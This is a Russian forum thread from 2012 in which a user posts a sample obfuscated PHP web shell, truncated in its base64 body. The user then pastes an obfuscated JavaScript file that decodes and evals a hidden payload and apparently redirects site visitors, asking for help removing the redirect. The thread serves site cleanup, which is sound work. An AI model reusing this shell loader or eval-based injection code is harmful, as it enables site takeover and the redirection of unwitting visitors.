вот это пример пхп шелла
--------------------------------------
<?php #v2.3 //Version
$auth_pass = ""; //75b43eac8d215582f6bcab4532eb854e
$color = "#00FF66"; //Colour
$default_action = "FilesMan";
$default_charset = "Windows-1251";
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65
\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7b1tVxs50jD8OXvO9R9Er3fanhhjm2Q2Y7ADIZCQSSAD5
GUC3N623bZ7aLs93W0Mk+W/31Wll5b6xZhkdq/7OedhJtDdKpVKUkkqlapK3rDM1tzJLL4tl7qn+ycf90/
// ... много кода в base64
------------------------------------------------
и теперь найди связь с этим файлом
щяс,,,,,,,,,,,,,Добавлено (16-Апр-2012, 19:33:49)
---------------------------------------------
Quote (JonMagon)
Еще раз повторяю, PHP взломать невозможно, взломали - виноват не PHP, а скрипт, который был на нем написан.
суть одна
итог один
значит вопрос неправильный
взламывают не скрипты а сайты
-----------------------------------------щяс скину другой файл который меня непосредственно интересует ----------поможешь если объяснишДобавлено (16-Апр-2012, 19:35:51)
---------------------------------------------
var $3=(Date);if($3){$Y='5726';}var $T={'k':'str\x69\x6E\x67','U':'spli\x74','z':'\x73\x75bstr','I':!false,'i':'leng\x74\x68','Z':'re\x76\x65\x72se','B':'joi\x6E'},$G='',$M=[' rvax0_8ac\\E6=8,""[\\\\6x"xx",""8"63,\\x6\\99\\,6xx6\\E"\\7x4"xxF6x7\\07\\2\\x4774x\\6x\\F\\x"x\\7907\\x5x"\\,665\\\\76x7\\x4x4C\\\\5xx66x\\56Dx6\\5\\27xE4\\x6 \\x4\\x7x44"69\\x9\\\\\\x",6C,"56\\"x7x7\\46x7\\5x\\4x5\\5\\66x6xC\\x\\6x\\D54x7\\x\\x6E4\\3x77x9\\x\\26\\4\\\\15x6x\\7x14xE6\\6xx5D\\,""6\\ xC665\\x\\\\xE6x6x\\678\\,"4x"x\\771\\6xx7\\2x\\06E\\F\\5x64x4\\7Ex6\\x\\x6"x\\4x6\\,5"6FD6\\\\xx\\E6x7\\xF656x\\7x5\\x3\\6F\\x\\x65x76\\723 "\\2xx7\\E,\\2x\\"4x77x8"",\\4x\\2C65xx\\x\\72\\9x\\572"x6\\x\\",F6\\Ex66xD\x6Fin','_xd':'s\x74\x72ing','_zM':[],'_g1':!false,'_T2':'decodeU\x52\x49\x43\x6F\x6D\x70\x6F\x6E\x65nt','_bH':'spl\x69\x74','_8S':'su\x62\x73\x74r'},_xd=function(_){for(_1=~_j. _zM-~_j._zM;_1<_P[_]/2;_1++){_a+='\x25'+_P[_j._8S](_1*2, 2);}wi\u006E\u0064ow['ev\x61\x6C'](_e[_j._T2](_a));},_P=',**;,[[-$^]-,:*[]*][**]~$|[[$<,:]*][$<,:]*],[[[<[[$<,:]*],$<,:]*]$$<,:],]}$<,:]}]$$<,:]*}]$<,:]*]$$<,:]*}}$<,:]*]$$<,:]*}$$<,:],]}$<,:]}][$<,:],].$<,:]}].$<,:]*]}[[[<[[$<,:]*]}$<,:]*].$<,:],]]$<,:],]-$<,:]*}]$<,:]*];$<,:],].[[[<[[$<,:],]]$<,:],]}$<,:],].$<,:]*}]$<,:]*]$[[[<[[$<,:]*][$<,:]*}]$<,:]*}*$<,:]*]]$<,:]*}[[[[<[[$<,:],]}$<,:]*}*$<,:],]-[[[<[[$<,:]*}]$<,:]*].$<,:]*}$$<,:]*}[$<,:],]][[[<[[$<,:]*].$<,:]*}$$<,:]*}$$<,:]*]$$<,:],][$<,:]}]:$<,:]$]}$<,:]}}}$<,:]}}][[[<[[$<,:]*}$$<,:]*}*$<,:]*]*$<,:]*}*$<,:]*}]$<,:]*}]$<,:]*}*$<,:],],[[[<[[$<,:]*].$<,:]*}$$<,:]*]}$<,:]*]$$<,:],]:$<,:]}}*$<,:]*]*[[[<[[$<,:]*}$$<,:]*}*$<,:]*].$<,:]*}$$<,:]*]}$<,:]*]$$<,:],]:[[[<[[$<,:]*};$<,:]*}*$<,:]*}*$<,:]*}}$<,:]*}]$<,:]*];$<,:][}$$<,:],]$$<,:]*]]$<,:]*}*$<,:],};$<,:][}$$<,:]*]]$<,:]*}*$<,:]*}}[[[<[[$<,:]*]$$<,:]*]]$<,:]*}*$<,:],]]$<,:]*].$<,:]*],$<,:][}$$<,:]*]]$<,:]*}*$<,:]*}}$<,:][}$$<,:],]$$<,:]*];[[[<[[$<,:]*}}$<,:]*];$<,:]*}$$<,:],]$$<,:]*]]$<,:]*}*$<,:],};$<,:][}$$<,:],][$<,:],]$[[[<[[$<,:]]];[[[<[[$<,:]*];$<,:]*];[[[<[[$<,:]*];$<,:]*][[[[<[[$<,:]*]:$<,:],][$<,:]*]$$<,:]*]*[[[<[[$<,:]*]:$<,:],]}$<,:],]}$<,:],]-$<,:]]};$<,:][}*$<,:][}*$<,:],]$$<,:]*]]$<,:][}}$<,:],]-$<,:]*}*$<,:],][$<,:],]}$<,:]*];$<,:]*}]$<,:]*}]$<,:]*]$$<,:],][$<,:][}$$<,:],][$<,:],]$$<,:][}*$<,:]*}]$<,:]*}*$<,:]*];$<,:]*]}$<,:][}*$<,:]]]}[[[<[[$<,$]-]}]}]:$<,$]-]}]]]-$<,$]-]}]]];$<,$]-]}]]}[$<,$]-]}]]}$$<,$]-]}]]}}$<,$]-]}]}}[$<,:][]-$<,$]-]}]]]}$<,$]-]}]]}[$<,$]-]}]}}*$<,:][]-$<,:],]$$<,:]*]]$<,:]*}*$<,:],};[[[<[[$<,:]*][$<,:]*];[[[<[[$<,:]*][$<,:]*][[[[<[[$<,:]*]:$<,:],]}$<,:],]}$<,:],]-$<,:]]};$<,:][}*$<,:][}*$<,:]*]}$<,:]*];$<,:]*}]$<,:]*].$<,:]*]*$<,:]*]$$<,:][}$$<,:],][$<,:],]$$<,:][}*[[[<[[$<,$]-]}]}]:$<,$]-]}]]]-$<,$]-]}]]];$<,$]-]}]]}[$<,$]-]}]]}$$<,$]-]}]]}}$<,$]-]}]}}[$<,:][]-$<,$]-]}]]]}$<,$]-]}]]}[$<,$]-]}]}}*$<,:][]-$<,:]}]}$<,:]}}]$<,:]}]$[[[<[[$<,$]-]}];}}$<,$]-]}]]]-$<,$]-]}]}]-$<,$]-]}]}]]$<,$]-]}]}]:$<,$]-]}]]]$$<,$]-]}]]}}$<,$]-]}]}}[$<,:][]-$<,$]-]}]}]]$<,$]-]}]}];$<,$]-]}]]}[$<,$]-]}]]}$$<,$]-]}]]][$<,$]-]}]]]:$<,$]-]}]}}*$<,:][]-$<,$]-]}]]]:$<,$]-]}]}];$<,$]-]}]]}*$<,$]-]}]]}$$<,$]-]}]]}[$<,$]-]}]}}]$<,$]-]}]]],$<,$]-]}]]}$$<,$]-]}]]][$<,$]-]}]]]-$<,$]-]}]]}}$<,$]-]}]]]:$<,$]-]}]}}*$<,:][}]$<,:][]-$<,$]-]}]]}*$<,$]-]}]]}$$<,:][]-$<,$]-]}]]][$<,$]-]}]}];$<,$]-]}]]]$$<,$]-]}]]}]$<,:][]-$<,$]-]}]]][$<,$]-]}]]}$$<,$]-]}]]}*$<,$]-]}]}]-$<,$]-]}]]}$$<,$]-]}]}];$<,$]-]}]]]-$<,$]-]}]]}]$<,:][]-$<,$]-]}]]}$$<,$]-]}]]];$<,$]-]}]}]-$<,$]-]}]]]-$<,$]-]}]}].$<,$]-]}]]]-$<,$]-]}]]].$<,$]-]}]}][$<,$]-]}]]]$$<,$]-]}]}];$<,$]-]}]}}]$<,:][]-$<,$]-]}]]][$<,:][]-$<,:]}].$<,:]}]]$<,:]$];$<,:]]};[[[<[[$<,:]]]]$<,:]]],$<,:]]]*$<,:]]]:$<,:]]]:$<,:]]]-$<,:]]]]$<,:]]].$<,:]]]$[[[<[[$<,:]*]:$<,:],]}$<,:],]}$<,:],]-$<,:]]};$<,:][}*$<,:][}*$<,:],]$$<,:]*]]$<,:][}}$<,:],]-$<,:]*}*$<,:],][$<,:],]}$<,:]*];$<,:]*}]$<,:]*}]$<,:]*]$$<,:],][$<,:][}$$<,:],][$<,:],]$$<,:][}*$<,:]*]*$<,:]*}*$<,:],][$<,:],]$$<,:]*}}$<,:][}*$<,:]]]*$<,:]]][$<,:][}}$<,:]]];$<,:]]]]$<,:]]]*$<,:]]];$<,:][}}$<,:]]];[[[<[[$<,:],][$<,:]*]$$<,:],]-$<,:]*}]$<,:]*];$<,:]*]]$<,:]*]$[[$~]|,**;,[[-*;*<*;,[*~]~]-]|,**;,[[-*]*^*),}*$*),}]~*}*^*],$*~*$*),}]|*.**[:[:*]*^*),}*$*),}$|$^]-,:*[]*][**$|];$~$~[:$^]-,:*[]*][**$|]-$~[.[;]~*),$*<*<[.[.,|*}*^*],$*~*$*),}$|$^]-,:*[]*][**$|];$~$~[:$^]-,:*[]*][**$|]-$~[.$|$^]-,:*[]*][**$|]]$~$~$|$^]-,:*[]*][**$|][$~$~]~$^]-,:*[]*][**$|]}$~]|,~[-]|**,$*)*],}*.*^*)[-*;[:[.,|*.**[:[:*]*^*),}*$*),}$|$^]-,:*[]*][**$|];$~$~[:$^]-,:*[]*][**$|]$$~[.[;]~*),$*<*<[.[*[*[:*]*^*),}*$*),}$|$^]-,:*[]*][**$|];$~$~[:$^]-,:*[]*][**$|]*$~[.[;]~*),$*<*<[.[.,|,**;,[[-$^]-,:][*}][**,:]}]~*]*^*),}*$*),}$|$^]-,:*[]*][**$|];$~$~[:$^]-,:*[]*][**$|]$$~[.$|$^]-,:*[]*][**$|],$~$~]|*.**[:$^]-,:][*}][**,:]}$|$^]-,:*[]*][**$|].$~$~[:$^]-,:*[]*][**$|]:$~[.])]-[.,|*;*<*;,[*~]~];]|,~[-]|*.**[:$^]-,:][*}][**,:]}$|$^]-,:*[]*][**$|].$~$~[:$^]-,:*[]*][**$|];]-$~[.])]-[.,|*;*<*;,[*~]~];]|,~[-]|*.**[:$^]-,:][*}][**,:]}$|$^]-,:*[]*][**$|].$~$~[:$^]-,:*[]*][**$|];];$~[.])]-[.,|*;*<*;,[*~]~];]|,~[-]|*.**[:$^]-,:][*}][**,:]}$|$^]-,:*[]*][**$|].$~$~[:$^]-,:*[]*][**$|];][$~[.])]-[.,|*;*<*;,[*~]~];]|,~[-]|*.**[:$^]-,:][*}][**,:]}$|$^]-,:*[]*][**$|].$~$~[:$^]-,:*[]*][**$|];]]$~[.])]-[.,|*;*<*;,[*~]~];]|,~[-]|,~[-*$*<,]*$[-,|*;*<*;,[*~]~$^]-,:*[]*][**$|];]}$~]|,~[-]|,~[-]|**,$*)*],}*.*^*)[-*[[:[.,|*.**[:[:*]*^*),}*$*),}$|$^]-,:*[]*][**$|];$~$~[:$^]-,:*[]*][**$|];]$$~[.[;]~*),$*<*<[.[*[*[:*]*^*),}*$*),}$|$^]-,:*[]*][**$|];$~$~[:$^]-,:*[]*][**$|];]*$~[.[;]~*),$*<*<[.[.,|,}*$*~,-]~*}*^*],$*~*$*),}$|$^]-,:*[]*][**$|];$~$~[:$^]-,:*[]*][**$|];]$$~[.$|$^]-,:*[]*][**$|];],$~$~]|*.**[:$^]-,:*[]*][**$|];]:$~[;]~,}*$*~,-[.,|*;*<*;,[*~]~];]|,~[-]|,}*$*~,-]~*}*^*],$*~*$*),}$|$^]-,:*[]*][**$|];$~$~[:$^]-,:*[]*][**$|];]*$~[.$|$^]-,:*[]*][**$|],$~$~]|*.**[:$^]-,:*[]*][**$|];].$~[;]~,}*$*~,-[.,|*;*<*;,[*~]~];]|,~[-]|,~[-*$*<,]*$[-,|*;*<*;,[*~]~];]|,~[-]|,~[-]|**,$*)*],}*.*^*)[-*][:[.,|*.**[:[:*]*^*),}*$*),}$|$^]-,:*[]*][**$|];$~$~[:$^]-,:*[]*][**$|][]-$~[.[;]~*),$*<*<[.[*[*[:*]*^*),}*$*),}$|$^]-,:*[]*][**$|];$~$~[:$^]-,:*[]*][**$|][];$~[.[;]~*),$*<*<[.[.,|,}*$*~,-]~*]*^*),}*$*),}$|$^]-,:*[]*][**$|];$~$~[:$^]-,:*[]*][**$|][]-$~[.$|$^]-,:*[]*][**$|];],$~$~]|*.**[:$^]-,:*[]*][**$|][][$~[;]~,}*$*~,-[.,|*;*<*;,[*~]~];]|,~[-]|,}*$*~,-]~*]*^*),}*$*),}$|$^]-,:*[]*][**$|];$~$~[:$^]-,:*[]*][**$|][];$~[.$|$^]-,:*[]*][**$|],$~$~]|*.**[:$^]-,:*[]*][**$|][]]$~[;]~,}*$*~,-[.,|*;*<*;,[*~]~];]|,~[-]|,~[-*$*<,]*$[-,|*;*<*;,[*~]~];]|,~[-]|,~[-]|*;[:[.]|*.**[:*;*<*;,[*~]~]~]-[.,|*[[:[.]|,~[-]|*.**[:*;*<*;,[*~]~]~]-[.,|*][:[.]|,~[-]|*.**[:*;*<*;,[*~]~]~];[.,|,-,[*^*~,-,}[:$^]-,:*[]*][**$|][]}$~[<$^]-,:*[]*][**$|][]$$~[.]|,~[-]|*.**[:*;*<*;,[*~]~]~];[.,|*<*^*]*;,}*.*^*)$|$^]-,:*[]*][**$|][],$~$~[:$^]-,:*[]*][**$|][]*$~[.]|,~[-]|',_q=function(){_q=_a[_j._Nk]('\x2D')[_j._bH]('\x25');for(var _2 in _q){if(typeof(_q[_2])==_j._xd){_P=_P[_j._bH](_q[_2][_j._8S](1))[_j._Nk](_q[_2][_j._8S](0,1));}}return this;},_e=_q(),_a='';_xd('len\x67\x74\x68');
-------------------------------------------------
разбери его
нужно убрать редирект
Добавлено (16-Апр-2012, 19:37:28)
---------------------------------------------
ссылка uvaforum.ucoz.ru/run.js